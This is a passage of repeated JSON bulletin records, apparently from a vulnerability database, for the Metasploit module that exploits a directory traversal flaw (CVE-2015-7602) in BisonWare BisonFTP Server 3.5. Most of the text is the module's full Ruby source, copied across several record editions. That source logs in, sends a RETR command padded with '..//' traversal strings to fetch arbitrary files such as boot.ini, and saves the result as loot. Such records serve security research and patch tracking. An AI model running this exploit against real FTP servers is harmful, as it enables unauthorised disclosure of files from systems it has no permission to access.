the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-06-04T15:50:02", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-07-20T20:46:11", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-07-20T20:46:11", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-07-20T22:50:09", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-07-20T22:50:09", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-21T19:29:27", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-21T19:29:27", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-21T21:31:43", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-21T21:31:43", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T15:32:48", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T15:32:48", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T17:34:15", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-08-28T17:34:15", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-08-28T19:33:32", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n 